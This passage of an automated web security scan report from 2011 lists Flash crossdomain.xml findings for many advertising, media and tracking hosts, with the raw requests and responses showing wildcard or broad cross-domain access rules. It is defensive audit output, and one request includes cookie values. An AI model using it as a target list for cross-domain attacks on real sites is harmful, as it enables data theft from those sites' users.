Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:06:33 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:36:33 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.72. http://traffic.outbrain.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://traffic.outbrain.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:24:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.73. http://trc.taboolasyndication.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.74. http://usatoday1.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www94
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.75. http://vast.ap919.btrll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vast.ap919.btrll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: vast.ap919.btrll.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/xml
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 01:12:49 GMT
Content-Length: 269

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.76. http://video.od.visiblemeasures.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.od.visiblemeasures.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:21 GMT
Content-Type: text/xml
Content-Length: 169
Last-Modified: Tue, 01 Mar 2011 06:21:28 GMT
X-Cnection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wac.3a03.edgecastcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wac.3a03.edgecastcdn.net

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:44:51 GMT
Last-Modified: Tue, 08 Mar 2011 05:43:30 GMT
Server: ECS (sjo/5227)
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-polic
...[SNIP]...

6.78. http://www.goutsa.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.goutsa.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.79. http://www.wunderground.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 05 May 2011 20:05:54 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.80. http://www.zvents.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 04 Sep 2011 01:00:47 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Connection: keep-alive
Expires: Mon, 05 Sep 2011 01:00:47 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.81. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.82. http://charlotteobserver.adperfect.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://charlotteobserver.adperfect.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: charlotteobserver.adperfect.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:19 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 00:38:56 GMT
Accept-Ranges: bytes
Content-Length: 343
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <site-control permitted-cross-domain-policies="all" /> <allow-access-from domain="*.adperfect.com" />
...[SNIP]...

6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.84. http://content.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.85. http://delivery.sprint.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://delivery.sprint.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: delivery.sprint.com

Response

HTTP/1.1 200 OK
Content-Length: 9520
Content-Type: text/xml
Last-Modified: Tue, 26 Apr 2011 22:25:29 GMT
Accept-Ranges: bytes
ETag: "c695d9604cc1:1de6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<!--Modified file on 1/5/2010 for security compl
...[SNIP]...
<allow-access-from domain="a676.g.akamaitech.net" />
<allow-access-from domain="staging.merchantmail.net" />
<allow-access-from domain="www.youcreatetheadventure.com" />
<allow-access-from domain="gap.p.delivery.net" />
<allow-access-from domain="*.akamaitech.net" />
<allow-access-from domain="*.garnier-rewards.com"/>
<allow-access-from domain="*.garnierrewards.com"/>
<allow-access-from domain="*.lexus.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-ppe.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="comcast.beamland.com" />
<allow-access-from domain="webwalker06.comcastonline.com"/>
<allow-access-from domain="dynamic.abc.go.com"/>
<allow-access-from domain="ll.static.abc.com"/>
<allow-access-from domain="ll.media.abc.com"/>
<allow-access-from domain="*.abc.go.com"/>
<allow-access-from domain="*.abc.com"/>

<allow-access-from domain="www.sprintenterprise.com"/>
<allow-access-from domain="sprintenterprise.com"/>
<allow-access-from domain="*.eurorscg.com"/>

<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="primediamags.com" />
<allow-access-from domain="sourceinterlinkpubs.com" />
<allow-access-from domain="wellsfargo.p.delivery.net" />
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="us.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etrade.com" secure="true" />
...[SNIP]...
<allow-access-from domain="a248.e.akamai.net" secure="true" />
...[SNIP]...
<allow-access-from domain="pandora.luxus.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="interactive.arn.com"/>
<allow-access-from domain="*.royalcaribbean.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rccl.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fedex.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theweekmagazine.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.twmo.us" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.it" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nokia.fi" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pt" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ae" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.hu" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.sa" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.gr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.ee" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.bg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.co.th" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.hr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.si" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.cz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.sk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.com.tr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mea.nokia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.se" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nokia.no" secure="false"/>
...[SNIP]...
<allow-access-from domain="view.atdmt.com" secure="false" />
...[SNIP]...
<allow-access-from domain="anon.screenplay.speedera.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.joyent.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1" secure="false" />
...[SNIP]...
<allow-access-from domain="72.2.118.90" secure="false" />
...[SNIP]...
<allow-access-from domain="118.2.72.in-addr.arpa" secure="false" />
...[SNIP]...
<allow-access-from domain="vmu-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="vmd-gap-app1.sf.akqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gap.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.cpbinteractive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="on.cpbstaging.com" secure="false" />
...[SNIP]...
<allow-access-from domain="oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="stage.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.oldnavyweekly.com.evohst.org" secure="false"/>
...[SNIP]...
<allow-access-from domain="onweeklydev.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="samsclub.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rockfishinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oldnavyweekly.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cpbstaging.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.intava.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lstudio.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cheerfactory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="app1.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="app2.gap.preloading.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.asimpletheory.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="208.82.64.0" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.64.22" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.10" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.11" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.12" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.13" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.14" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.15" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.16" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.17" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.18" secure="true" />
...[SNIP]...
<allow-access-from domain="208.82.66.19" secure="true" />
...[SNIP]...
<allow-access-from domain="69.25.20.216" secure="true" />
...[SNIP]...
<allow-access-from domain="stage-user-comcast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="24.40.23.69" secure="false" />
...[SNIP]...
<allow-access-from domain="68.87.60.144" secure="false" />
...[SNIP]...
<allow-access-from domain="*.acxiomdigital.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.jellyvision-conversation.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="159.153.236.12" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.progressive.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.materialdev.com" secure="false" />
...[SNIP]...

6.86. http://developers.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.28.34.106
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.87. http://disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:27 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
X-User: anon:608614822849
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

6.88. http://espn.go.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://espn.go.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: espn.go.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5184000
Connection: close
Date: Sun, 04 Sep 2011 01:22:27 GMT
Content-Type: text/xml
Last-Modified: Thu, 25 Aug 2011 19:50:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N730
Cache-Expires: Tue, 01 Nov 2011 19:32:31 GMT
Content-Length: 7286
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.sportsnation.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="profiles.staging.espnfp.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adsatt.espn.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.static.espn.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.espn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" to-ports="*"/>
   <allow-access-from domain="*.2mdn.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arn.com"/>
   <allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.clearspring.com" to-ports="*" secure="false"/>
...[SNIP]...
